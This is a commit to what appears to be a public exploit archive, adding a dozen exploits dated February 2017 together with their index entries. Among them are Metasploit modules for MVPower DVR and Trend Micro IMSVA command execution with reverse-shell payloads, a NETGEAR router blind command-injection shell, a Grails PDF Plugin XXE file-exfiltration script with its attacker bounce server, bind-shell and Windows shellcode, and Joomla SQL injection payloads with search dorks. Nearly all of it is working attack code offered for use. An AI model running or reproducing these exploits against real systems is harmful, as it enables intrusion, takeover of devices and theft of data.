DB: 2017-02-28

12 new exploits MVPower DVR TV-7104HE 1.8.4 115215B9 - Shell Unauthenticated Command Execution (Metasploit) Windows x86 - Executable Directory Search Shellcode (130 bytes) Linux/x86_64 - Random Listener Shellcode (54 bytes) NETGEAR DGN2200v1/v2/v3/v4 - 'dnslookup.cgi' Remote Command Execution Joomla! Component Gnosis 1.1.2 - 'id' Parameter SQL Injection Trend Micro InterScan Messaging Security (Virtual Appliance) - Remote Code Execution (Metasploit) Joomla! Component Appointments for JomSocial 3.8.1 - SQL Injection Joomla! Component My MSG 3.2.1 - SQL Injection Joomla! Component Spinner 360 1.3.0 - SQL Injection Joomla! Component JomSocial - SQL Injection Grails PDF Plugin 0.6 - XML External Entity Injection Joomla! Component OneVote! 1.0 - SQL Injection
2017-02-28 05:01:17 +00:00 · 2017-02-28 05:01:17 +00:00 · 026ded7298
commit 026ded7298
parent 3f1035a488
13 changed files with 712 additions and 0 deletions
--- a/files.csv
+++ b/files.csv
@ -15300,6 +15300,7 @@ id,file,description,date,author,platform,type,port
 41366,platforms/java/remote/41366.java,"OpenText Documentum D2 - Remote Code Execution",2017-02-15,"Andrey B. Panfilov",java,remote,0
 41436,platforms/windows/remote/41436.py,"Disk Savvy Enterprise 9.4.18 - Buffer Overflow (SEH)",2017-02-22,"Peter Baris",windows,remote,0
 41443,platforms/macos/remote/41443.html,"macOS HelpViewer 10.12.1 - XSS Leads to Arbitrary File Execution and Arbitrary File Read",2017-02-23,"Google Security Research",macos,remote,0
 41471,platforms/arm/remote/41471.rb,"MVPower DVR TV-7104HE 1.8.4 115215B9 - Shell Unauthenticated Command Execution (Metasploit)",2017-02-27,Metasploit,arm,remote,0
 14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) & execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0
 13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0
 13242,platforms/bsd/shellcode/13242.txt,"BSD - Passive Connection Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0
@ -15917,6 +15918,8 @@ id,file,description,date,author,platform,type,port
 41398,platforms/linux/shellcode/41398.nasm,"Linux - Reverse Shell Shellcode (66 bytes)",2017-02-19,"Robert L. Taylor",linux,shellcode,0
 41403,platforms/lin_x86/shellcode/41403.c,"Linux/x86 - SELinux Permissive Mode Switcher Shellcode (45 bytes)",2017-02-20,"Krzysztof Przybylski",lin_x86,shellcode,0
 41439,platforms/linux/shellcode/41439.c,"Linux/x86-64 - Egghunter Shellcode (38 bytes)",2017-02-23,odzhancode,linux,shellcode,0
 41467,platforms/win_x86/shellcode/41467.c,"Windows x86 - Executable Directory Search Shellcode (130 bytes)",2017-02-26,"Krzysztof Przybylski",win_x86,shellcode,0
 41468,platforms/lin_x86-64/shellcode/41468.nasm,"Linux/x86_64 - Random Listener Shellcode (54 bytes)",2017-02-26,"Robert L. Taylor",lin_x86-64,shellcode,0
 6,platforms/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,php,webapps,0
 44,platforms/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",php,webapps,0
 47,platforms/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,php,webapps,0
@ -37375,3 +37378,12 @@ id,file,description,date,author,platform,type,port
 41453,platforms/multiple/webapps/41453.html,"Apple WebKit 10.0.2 - 'Frame::setDocument' Universal Cross-Site Scripting",2017-02-24,"Google Security Research",multiple,webapps,0
 41455,platforms/php/webapps/41455.txt,"memcache-viewer - Cross-Site Scripting",2017-02-24,HaHwul,php,webapps,0
 41456,platforms/php/webapps/41456.txt,"Joomla! Component Intranet Attendance Track 2.6.5 - SQL Injection",2017-02-25,"Ihsan Sencan",php,webapps,0
 41459,platforms/hardware/webapps/41459.py,"NETGEAR DGN2200v1/v2/v3/v4 - 'dnslookup.cgi' Remote Command Execution",2017-02-25,SivertPL,hardware,webapps,0
 41460,platforms/php/webapps/41460.txt,"Joomla! Component Gnosis 1.1.2 - 'id' Parameter SQL Injection",2017-02-25,"Ihsan Sencan",php,webapps,0
 41461,platforms/multiple/webapps/41461.rb,"Trend Micro InterScan Messaging Security (Virtual Appliance) - Remote Code Execution (Metasploit)",2017-01-15,"Mehmet Ince",multiple,webapps,0
 41462,platforms/php/webapps/41462.txt,"Joomla! Component Appointments for JomSocial 3.8.1 - SQL Injection",2017-02-25,"Ihsan Sencan",php,webapps,0
 41463,platforms/php/webapps/41463.txt,"Joomla! Component My MSG 3.2.1 - SQL Injection",2017-02-25,"Ihsan Sencan",php,webapps,0
 41464,platforms/php/webapps/41464.txt,"Joomla! Component Spinner 360 1.3.0 - SQL Injection",2017-02-25,"Ihsan Sencan",php,webapps,0
 41465,platforms/php/webapps/41465.txt,"Joomla! Component JomSocial - SQL Injection",2017-02-25,"Ihsan Sencan",php,webapps,0
 41466,platforms/java/webapps/41466.py,"Grails PDF Plugin 0.6 - XML External Entity Injection",2017-02-21,"Charles Fol",java,webapps,0
 41470,platforms/php/webapps/41470.txt,"Joomla! Component OneVote! 1.0 - SQL Injection",2017-02-27,"Ihsan Sencan",php,webapps,0
--- a/platforms/arm/remote/41471.rb
+++ b/platforms/arm/remote/41471.rb
@ -0,0 +1,97 @@
 ##
 # This module requires Metasploit: http://metasploit.com/download
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking
  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::CmdStager
  HttpFingerprint = { :pattern => [ /JAWS\/1\.0/ ] }
  def initialize(info = {})
    super(update_info(info,
      'Name'        => 'MVPower DVR Shell Unauthenticated Command Execution',
      'Description' => %q{
        This module exploits an unauthenticated remote command execution
        vulnerability in MVPower digital video recorders. The 'shell' file
        on the web interface executes arbitrary operating system commands in
        the query string.
        This module was tested successfully on a MVPower model TV-7104HE with
        firmware version 1.8.4 115215B9 (Build 2014/11/17).
        The TV-7108HE model is also reportedly affected, but untested.
      },
      'Author'      =>
        [
          'Paul Davies (UHF-Satcom)', # Initial vulnerability discovery and PoC
          'Andrew Tierney (Pen Test Partners)', # Independent vulnerability discovery and PoC
          'Brendan Coles <bcoles[at]gmail.com>' # Metasploit
        ],
      'License'     => MSF_LICENSE,
      'Platform'    => 'linux',
      'References'  =>
        [
          # Comment from Paul Davies contains probably the first published PoC
          [ 'URL', 'https://labby.co.uk/cheap-dvr-teardown-and-pinout-mvpower-hi3520d_v1-95p/' ],
          # Writeup with PoC by Andrew Tierney from Pen Test Partners
          [ 'URL', 'https://www.pentestpartners.com/blog/pwning-cctv-cameras/' ]
        ],
      'DisclosureDate' => 'Aug 23 2015',
      'Privileged'     => true, # BusyBox
      'Arch'           => ARCH_ARMLE,
      'DefaultOptions' =>
        {
          'PAYLOAD' => 'linux/armle/mettle_reverse_tcp',
          'CMDSTAGER::FLAVOR' => 'wget'
        },
      'Targets'        =>
        [
          ['Automatic', {}]
        ],
      'CmdStagerFlavor' => %w{ echo printf wget },
      'DefaultTarget'   => 0))
  end
  def check
    begin
      fingerprint = Rex::Text::rand_text_alpha(rand(10) + 6)
      res = send_request_cgi(
        'uri' => "/shell?echo+#{fingerprint}",
        'headers' => { 'Connection' => 'Keep-Alive' }
      )
      if res && res.body.include?(fingerprint)
        return CheckCode::Vulnerable
      end
    rescue ::Rex::ConnectionError
      return CheckCode::Unknown
    end
    CheckCode::Safe
  end
  def execute_command(cmd, opts)
    begin
      send_request_cgi(
        'uri' => "/shell?#{Rex::Text.uri_encode(cmd, 'hex-all')}",
        'headers' => { 'Connection' => 'Keep-Alive' }
      )
    rescue ::Rex::ConnectionError
      fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server")
    end
  end
  def exploit
    print_status("#{peer} - Connecting to target")
    unless check == CheckCode::Vulnerable
      fail_with(Failure::Unknown, "#{peer} - Target is not vulnerable")
    end
    print_good("#{peer} - Target is vulnerable!")
    execute_cmdstager(linemax: 1500)
  end
 end
--- a/platforms/hardware/webapps/41459.py
+++ b/platforms/hardware/webapps/41459.py
@ -0,0 +1,40 @@
 #!/usr/bin/python
 #Provides access to default user account, privileges can be easily elevated by using either:
 # - a kernel exploit (ex. memodipper was tested and it worked)
 # - by executing /bin/bd (suid backdoor present on SOME but not all versions)
 # - by manipulating the httpd config files to trick the root user into executing your code (separate advisory will be released soon)
 #Pozdrawiam: Kornela, Komara i Sknerusa
 import sys
 import requests
 #You can change these credentials to ex. Gearguy/Geardog or Guest/Guest which are hardcoded on SOME firmware versions
 #These routers DO NOT support telnet/ssh access so you can use this exploit to access the shell if you want to
 login = 'admin'
 password = 'password'
 def main():
    if len(sys.argv) < 2:
        print "./netgearpwn_2.py <router ip>"
        return
    spawnShell()
 def execute(cmd): #Escaping basic sanitization
    requests.post("http://" + sys.argv[1] + "/dnslookup.cgi", data={'host_name':"www.google.com; " + cmd, 'lookup': "Lookup"}, auth=(login, password))
    return
 def spawnShell():
    print "Dropping a shell-like environment (blind OS injection)"
    print "To test it type 'reboot'"
    while True:
        cmd = raw_input("[blind $] ")
        execute(cmd)
 if __name__ == "__main__":
    main()
 #2017-02-25 by SivertPL
 #Tak, to ja.
--- a/platforms/java/webapps/41466.py
+++ b/platforms/java/webapps/41466.py
@ -0,0 +1,140 @@
 # Exploit Title: Grails PDF Plugin 0.6 XXE
 # Date: 21/02/2017
 # Vendor Homepage: http://www.grails.org/plugin/pdf
 # Software Link: https://github.com/aeischeid/grails-pdfplugin
 # Exploit Author: Charles FOL
 # Contact: https://twitter.com/ambionics
 # Website: https://www.ambionics.io/blog/grails-pdf-plugin-xxe
 # Version: 0.6
 # CVE : N/A
 1. dump_file.py
 #!/usr/bin/python3
 # Grails PDF Plugin XXE
 # cf
 # https://www.ambionics.io/blog/grails-pdf-plugin-xxe
 import requests
 import sys
 import os
 # Base URL of the Grails target
 URL = 'http://10.0.0.179:8080/grailstest'
 # "Bounce" HTTP Server
 BOUNCE = 'http://10.0.0.138:7777/'
 session = requests.Session()
 pdfForm = '/pdf/pdfForm?url='
 renderPage = 'render.html'
 if len(sys.argv) < 0:
    print('usage: ./%s <resource>' % sys.argv[0])
    print('e.g.:  ./%s file:///etc/passwd' % sys.argv[0])
    exit(0)
 resource = sys.argv[1]
 # Build the full URL
 full_url = URL + pdfForm + pdfForm + BOUNCE + renderPage
 full_url += '&resource=' + sys.argv[1]
 r = requests.get(full_url, allow_redirects=False)
 #print(full_url)
 if r.status_code != 200:
    print('Error: %s' % r)
 else:
    with open('/tmp/file.pdf', 'wb') as handle:
        handle.write(r.content)
    os.system('pdftotext /tmp/file.pdf')
    with open('/tmp/file.txt', 'r') as handle:
        print(handle.read(), end='')
 2. server.py
 #!/usr/bin/python3
 # Grails PDF Plugin XXE
 # cf
 # https://www.ambionics.io/blog/grails-pdf-plugin-xxe
 #
 # Server part of the exploitation
 #
 # Start it in an empty folder:
 # $ mkdir /tmp/empty
 # $ mv server.py /tmp/empty
 # $ /tmp/empty/server.py
 import http.server
 import socketserver
 import sys
 BOUNCE_IP = '10.0.0.138'
 BOUNCE_PORT = int(sys.argv[1]) if len(sys.argv) > 1 else 80
 # Template for the HTML page
 template = """<?xml version="1.0" encoding="utf-8"?>
 <!DOCTYPE html [
 <!ENTITY % start "<![CDATA[">
 <!ENTITY % goodies SYSTEM "[RESOURCE]">
 <!ENTITY % end "]]>">
 <!ENTITY % dtd SYSTEM "http://[BOUNCE]/out.dtd">
 %dtd;
 ]>
 <html>
    <head>
        <style>
            body { font-size: 1px; width: 1000000000px;}
        </style>
    </head>
    <body>
        <pre>&all;</pre>
    </body>
 </html>"""
 # The external DTD trick allows us to get more files; they would've been
 invalid
 # otherwise
 # See: https://www.vsecurity.com/download/papers/XMLDTDEntityAttacks.pdf
 dtd = """<?xml version="1.0" encoding="UTF-8"?>
 <!ENTITY all "%start;%goodies;%end;">
 """
 # Really hacky. When the render.html page is requested, we extract the
 # 'resource=XXX' part of the URL and create an HTML file which XXEs it.
 class GetHandler(http.server.SimpleHTTPRequestHandler):
    def do_GET(self):
        if 'render.html' in self.path:
            resource = self.path.split('resource=')[1]
            print('Resource: %s' % resource)
            page = template
            page = page.replace('[RESOURCE]', resource)
            page = page.replace('[BOUNCE]', '%s:%d' % (BOUNCE_IP,
 BOUNCE_PORT))
            with open('render.html', 'w') as handle:
                handle.write(page)
        return super().do_GET()
 Handler = GetHandler
 httpd = socketserver.TCPServer(("", BOUNCE_PORT), Handler)
 with open('out.dtd', 'w') as handle:
    handle.write(dtd)
 print("Started HTTP server on port %d, press Ctrl-C to exit..." %
 BOUNCE_PORT)
 try:
    httpd.serve_forever()
 except KeyboardInterrupt:
    print("Keyboard interrupt received, exiting.")
    httpd.server_close()
--- a/platforms/lin_x86-64/shellcode/41468.nasm
+++ b/platforms/lin_x86-64/shellcode/41468.nasm
@ -0,0 +1,73 @@
 ;The MIT License (MIT)
 ;Copyright (c) 2017 Robert L. Taylor
 ;Permission is hereby granted, free of charge, to any person obtaining a 
 ;copy of this software and associated documentation files (the “Software”), 
 ;to deal in the Software without restriction, including without limitation 
 ;the rights to use, copy, modify, merge, publish, distribute, sublicense, 
 ;and/or sell copies of the Software, and to permit persons to whom the 
 ;Software is furnished to do so, subject to the following conditions:
 ;The above copyright notice and this permission notice shall be included 
 ;in all copies or substantial portions of the Software.
 ;The Software is provided “as is”, without warranty of any kind, express or
 ;implied, including but not limited to the warranties of merchantability, 
 ;fitness for a particular purpose and noninfringement. In no event shall the
 ;authors or copyright holders be liable for any claim, damages or other 
 ;liability, whether in an action of contract, tort or otherwise, arising 
 ;from, out of or in connection with the software or the use or other 
 ;dealings in the Software.
 ;
 ; For a detailed explanation of this shellcode see my blog post: 
 ; http://a41l4.blogspot.ca/2017/02/shellrandomlisten1434.html
 global _start 
 section .text
 _start:
 ; Socket
 	push 41
 	pop rax
 	push 2
 	pop rdi
 	push 1
 	pop rsi
 	cdq
 	syscall
 ; Listen
 	xor esi,esi
 	xchg eax,edi
 	mov al,50
 	syscall 
 ; Accept
 	mov al,43
 	syscall 
 ; Dup 2
 	push 3
 	pop rsi
 	xchg edi,eax
 dup2loop:
 	push 33
 	pop rax
 	dec esi
 	syscall 
 	jne dup2loop
 ; Execve
 	; rax and rsi and rdx are zero already
        push rax ; zero terminator for the following string that we are pushing
        ; push /bin//sh in reverse
        mov rbx, '/bin//sh'
        push rbx
        ; store /bin//sh address in RDI
 	push rsp
 	pop rdi
        ; Call the Execve syscall
 	mov al, 59
        syscall
--- a/platforms/multiple/webapps/41461.rb
+++ b/platforms/multiple/webapps/41461.rb
@ -0,0 +1,144 @@
 ##
 # This module requires Metasploit: http://metasploit.com/download
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking
  include Msf::Exploit::Remote::HttpClient
  def initialize(info={})
    super(update_info(info,
      'Name'           => 'Trend Micro InterScan Messaging Security (Virtual Appliance) Remote Code Execution',
      'Description'    => %q{
        This module exploits a command injection vulnerability in the Trend Micro
        IMSVA product. An authenticated user can execute a terminal command under
        the context of the web server user which is root. Besides, default installation
        of IMSVA comes with a default administrator credentials.
        saveCert.imss endpoint takes several user inputs and performs blacklisting.
        After that it use them as argument of predefined operating system command
        without proper sanitation. However,due to improper blacklisting rule it's possible to inject
        arbitrary commands into it. InterScan Messaging Security prior to 9.1.-1600 affected by this issue.
        This module was tested against IMSVA 9.1-1600.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Mehmet Ince <mehmet@mehmetince.net>' # discovery & msf module
        ],
      'References'     =>
        [
          ['URL', 'https://pentest.blog/advisory-trend-micro-interscan-messaging-security-virtual-appliance-remote-code-execution/']
        ],
      'Privileged'     => true,
      'Payload'        =>
        {
          'Space'       => 1024,
          'DisableNops' => true,
          'BadChars'    => "\x2f\x22"
        },
      'DefaultOptions' =>
        {
          'SSL' => true,
          'payload' => 'python/meterpreter/reverse_tcp',
        },
      'Platform'       => ['python'],
      'Arch'           => ARCH_PYTHON,
      'Targets'        => [ ['Automatic', {}] ],
      'DisclosureDate' => 'Jan 15 2017',
      'DefaultTarget'  => 0
       ))
    register_options(
      [
        OptString.new('TARGETURI', [true, 'The target URI of the Trend Micro IMSVA', '/']),
        OptString.new('USERNAME', [ true, 'The username for authentication', 'admin' ]),
        OptString.new('PASSWORD', [ true, 'The password for authentication', 'imsva' ]),
        Opt::RPORT(8445)
      ]
    )
  end
  def login
    user = datastore['USERNAME']
    pass = datastore['PASSWORD']
    print_status("Attempting to login with #{user}:#{pass}")
    res = send_request_cgi({
      'method' => 'POST',
      'uri'    => normalize_uri(target_uri.path, 'login.imss'),
      'vars_post' => {
        'userid' => user,
        'pwdfake' => Rex::Text::encode_base64(pass)
      }
    })
    if res && res.body.include?("The user name or password you entered is invalid")
      fail_with(Failure::NoAccess, "#{peer} - Login with #{user}:#{pass} failed...")
    end
    cookie = res.get_cookies
    if res.code == 302 && cookie.include?("JSESSIONID")
      jsessionid = cookie.scan(/JSESSIONID=(\w+);/).flatten.first
      print_good("Authenticated as #{user}:#{pass}")
      return jsessionid
    end
    nil
  end
  def exploit
    jsessionid = login
    unless jsessionid
      fail_with(Failure::Unknown, 'Unable to obtain the cookie session ID')
    end
    # Somehow java stores last visited url on session like viewstate!
    # Visit form before submitting it. Otherwise, it will cause a crash.
    res = send_request_cgi({
      'method' => 'POST',
      'uri'    => normalize_uri(target_uri.path, 'initCert.imss'),
      'cookie' => "JSESSIONID=#{jsessionid}"
    })
    if !res or !res.body.include?("Transport Layer Security")
      fail_with(Failure::Unknown, 'Unable to visit initCert.imss')
    end
    # Random string that will be used as a cert name, state, email etc.
    r = Rex::Text::rand_text_alphanumeric(5)
    print_status("Delivering payload...")
    # Since double quote are blacklisted, we are using Single, Backslash, Single, Single on our payload. Thanks to @wvu !!!
    res = send_request_cgi({
      'method' => 'POST',
      'uri'    => normalize_uri(target_uri.path, 'saveCert.imss'),
      'cookie' => "JSESSIONID=#{jsessionid}",
      'vars_get' => {
          'mode' => 0
      },
      'vars_post' => {
        'certName' => r,
        'certType' => 0,
        'keyLength' => 2048,
        'countryCode' => 'TR',
        'state' => r,
        'locality' => r,
        'org' => r,
        'orgUnit' => r,
        'commonName' => "#{r}';python -c '#{payload.encoded.gsub("'", "'\\\\''")}' #",
        'emailAddress' => "#{r}@mail.com",
        'validDays' => '',
        'id' => '',
      }
    })
  end
 end
--- a/platforms/php/webapps/41460.txt
+++ b/platforms/php/webapps/41460.txt
@ -0,0 +1,17 @@
 # # # # # 
 # Exploit Title: Joomla! Component Gnosis v1.1.2 - SQL Injection
 # Google Dork: inurl:index.php?option=com_gnosis
 # Date: 25.02.2017
 # Vendor Homepage: http://hypermodern.org/
 # Software : https://extensions.joomla.org/extensions/extension/directory-a-documentation/glossary/gnosis/
 # Demo: http://gnosis.hypermodern.org/index.php/dictionary
 # Version: 1.1.2
 # Tested on: Win7 x64, Kali Linux x64
 # # # # # 
 # Exploit Author: Ihsan Sencan
 # Author Web: http://ihsan.net
 # Author Mail : ihsan[@]ihsan[.]net
 # # # # #
 # SQL Injection/Exploit :
 # http://localhost/[PATH]/index.php?option=com_gnosis&view=tags&id=[SQL]
 # # # # #
--- a/platforms/php/webapps/41462.txt
+++ b/platforms/php/webapps/41462.txt
@ -0,0 +1,22 @@
 # # # # # 
 # Exploit Title: Joomla! Component Appointments for JomSocial v3.8.1 - SQL Injection
 # Google Dork: N/A
 # Date: 25.02.2017
 # Vendor Homepage: https://www.cmsplugin.com/
 # Software : https://www.cmsplugin.com/products/components/1-appointments-for-jomsocial
 # Demo: http://extensions.cmsplugin.com/extensions/j3demo/my-appointments/
 # Version: 3.8.1 
 # Tested on: Win7 x64, Kali Linux x64
 # # # # # 
 # Exploit Author: Ihsan Sencan
 # Author Web: http://ihsan.net
 # Author Mail : ihsan[@]ihsan[.]net
 # # # # #
 # SQL Injection/Exploit :
 # Login as regular user
 # http://localhost/[PATH]/my-appointments/viewappointment?id=[SQL]
 # http://localhost/[PATH]/my-appointments/my-appointments/edit?id=[SQL]
 # '+order+by+10-- -
 # Etc...
 # # # # #
--- a/platforms/php/webapps/41463.txt
+++ b/platforms/php/webapps/41463.txt
@ -0,0 +1,22 @@
 # # # # # 
 # Exploit Title: Joomla! Component My MSG v3.2.1 - SQL Injection
 # Google Dork: N/A
 # Date: 25.02.2017
 # Vendor Homepage: https://www.cmsplugin.com/
 # Software : https://www.cmsplugin.com/products/components/10-my-msg
 # Demo: http://extensions.cmsplugin.com/extensions/j3demo/my-msg
 # Version: 3.2.1
 # Tested on: Win7 x64, Kali Linux x64
 # # # # # 
 # Exploit Author: Ihsan Sencan
 # Author Web: http://ihsan.net
 # Author Mail : ihsan[@]ihsan[.]net
 # # # # #
 # SQL Injection/Exploit :
 # Login as regular user
 # http://localhost/[PATH]/index.php?option=com_mymsg&layout=edit&reply_id=[SQL]
 # http://localhost/[PATH]/index.php?option=com_mymsg&view=msg&filter_box=[SQL]
 # http://localhost/[PATH]/index.php?option=com_mymsg&view=mymsg&Ihsan_Sencan=[SQL]
 # '+order+by+10-- -
 # Etc...
 # # # # #
--- a/platforms/php/webapps/41464.txt
+++ b/platforms/php/webapps/41464.txt
@ -0,0 +1,17 @@
 # # # # # 
 # Exploit Title: Joomla! Component Spinner 360 v1.3.0 - SQL Injection
 # Google Dork: N/A
 # Date: 25.02.2017
 # Vendor Homepage: https://www.cmsplugin.com/
 # Software : https://www.cmsplugin.com/products/components/13-spinner360
 # Demo: http://extensions.cmsplugin.com/extensions/j3demo/spinner-360
 # Version: 1.3.0
 # Tested on: Win7 x64, Kali Linux x64
 # # # # # 
 # Exploit Author: Ihsan Sencan
 # Author Web: http://ihsan.net
 # Author Mail : ihsan[@]ihsan[.]net
 # # # # #
 # SQL Injection/Exploit :
 # http://localhost/[PATH]/spinner-360?Ihsan_Sencan=[SQL]
 # # # # #
--- a/platforms/php/webapps/41465.txt
+++ b/platforms/php/webapps/41465.txt
@ -0,0 +1,20 @@
 # # # # # 
 # Exploit Title: Joomla! Component JomSocial - SQL Injection
 # Google Dork: N/A
 # Date: 25.02.2017
 # Vendor Homepage: https://www.cmsplugin.com/
 # Software : http://extensions.cmsplugin.com/extensions/j3demo/jomsocial
 # Demo: http://extensions.cmsplugin.com/extensions/j3demo/jomsocial
 # Version: N/A
 # Tested on: Win7 x64, Kali Linux x64
 # # # # # 
 # Exploit Author: Ihsan Sencan
 # Author Web: http://ihsan.net
 # Author Mail : ihsan[@]ihsan[.]net
 # # # # #
 # SQL Injection/Exploit :
 # Login as regular user
 # http://localhost/[PATH]/groups/?IhsanSencan=[SQL]
 # http://localhost/[PATH]/videos/?IhsanSencan=[SQL]
 # http://localhost/[PATH]/events/?IhsanSencan=[SQL]
 # # # # #
--- a/platforms/php/webapps/41470.txt
+++ b/platforms/php/webapps/41470.txt
@ -0,0 +1,18 @@
 # # # # # 
 # Exploit Title: Joomla! Component OneVote! v1.0 - SQL Injection
 # Google Dork: inurl:index.php?option=com_onevote
 # Date: 27.02.2017
 # Vendor Homepage: http://advcomsys.com/
 # Software: https://extensions.joomla.org/extensions/extension/contacts-and-feedback/polls/onevote/
 # Demo: http://advcomsys.com/index.php/joomla-demos/elections
 # Version: 1.0
 # Tested on: Win7 x64, Kali Linux x64
 # # # # # 
 # Exploit Author: Ihsan Sencan
 # Author Web: http://ihsan.net
 # Author Mail : ihsan[@]ihsan[.]net
 # # # # #
 # SQL Injection/Exploit :
 # http://localhost/[PATH]/components/com_onevote/results.php?election_id=[SQL]
 # +/*!50000union*/+select+@@version-- -
 # # # # #
--- a/platforms/win_x86/shellcode/41467.c
+++ b/platforms/win_x86/shellcode/41467.c
@ -0,0 +1,90 @@
 # Title: Windows x86 - Executable directory search Shellcode (130 bytes)
 # Date: 26-02-2017
 # Author: Krzysztof Przybylski
 # Platform: Win_x86
 # Tested on: WinXP SP1
 # Shellcode Size: 130 bytes
 /*
 Description: 
 write & exec dir searcher
 starts from C:\
 If dir found then write, execute (ping 127.1.1.1) and exit
 If Write/noexec dir found then continue
 Tested on WinXP SP1 (77e6fd35;77e798fd)
 i686-w64-mingw32-gcc shell.c -o golddgger.exe
 Null-free version:
 (gdb) disassemble 
 Dump of assembler code for function function:
 => 0x08048062 <+0>:	pop    ecx
   0x08048063 <+1>:	xor    eax,eax
   0x08048065 <+3>:	mov    BYTE PTR [ecx+0x64],al
   0x08048068 <+6>:	push   eax
   0x08048069 <+7>:	push   ecx
   0x0804806a <+8>:	mov    eax,0x77e6fd35
   0x0804806f <+13>:	call   eax
   0x08048071 <+15>:	xor    eax,eax
   0x08048073 <+17>:	push   eax
   0x08048074 <+18>:	mov    eax,0x77e798fd
   0x08048079 <+23>:	call   eax
 NULL-free shellcode (132 bytes):
 "\xeb\x19\x59\x31\xc0\x88\x41\x64"
 "\x50\x51\xb8"
 "\x35\xfd\xe6\x77"                      // exec
 "\xff\xd0\x31\xc0\x50\xb8"
 "\xfd\x98\xe7\x77"                      // exit
 "\xff\xd0\xe8\xe2\xff\xff\xff"
 "\x63\x6d\x64\x2e\x65\x78\x65\x20"
 "\x2f\x43\x20\x22\x28\x63\x64\x20"
 "\x63\x3a\x5c"                          // C:\
 "\x20\x26\x46\x4f\x52"
 "\x20\x2f\x44\x20\x2f\x72\x20\x25"
 "\x41\x20\x49\x4e\x20\x28\x2a\x29"
 "\x20\x44\x4f\x20"
 "\x65\x63\x68\x6f\x20"
 "\x70\x69\x6e\x67\x20"                  
 "\x31\x37\x32\x2e\x31\x2e\x31\x2e\x31"  // 127.1.1.1
 "\x3e\x22\x25\x41\x5c\x7a\x2e\x62"
 "\x61\x74\x22\x26\x28\x63\x61\x6c"
 "\x6c\x20\x22\x25\x41\x5c\x7a\x2e"
 "\x62\x61\x74\x22\x26\x26\x65\x78"
 "\x69\x74\x29\x29\x22";
 */
 // NULL version (130 bytes):
 char code[] = 
 "\xeb\x16\x59\x31\xc0\x50\x51\xb8"
 "\x35\xfd\xe6\x77"                 	// exec
 "\xff\xd0\x31\xc0\x50\xb8"
 "\xfd\x98\xe7\x77"                  	// exit
 "\xff\xd0\xe8\xe5\xff\xff\xff\x63"
 "\x6d\x64\x2e\x65\x78\x65\x20\x2f"
 "\x43\x20\x22\x28\x63\x64\x20"
 "\x63\x3a\x5c"                      	// C:\
 "\x20\x26\x46\x4f\x52\x20\x2f\x44"
 "\x20\x2f\x72\x20\x25\x41\x20\x49"
 "\x4e\x20\x28\x2a\x29\x20\x44\x4f"
 "\x20\x65\x63\x68\x6f\x20\x70\x69"
 "\x6e\x67\x20"
 "\x31\x37\x32\x2e\x31\x2e\x31\x2e\x31"	// 127.1.1.1 
 "\x3e\x22\x25\x41"
 "\x5c\x7a\x2e\x62\x61\x74\x22\x26"
 "\x28\x63\x61\x6c\x6c\x20\x22\x25"
 "\x41\x5c\x7a\x2e\x62\x61\x74\x22"
 "\x26\x26\x65\x78\x69\x74\x29\x29"
 "\x22\x00";
 int main(int argc, char **argv)
 {
        int (*func)();
        func = (int (*)()) code;
        (int)(*func)();
 }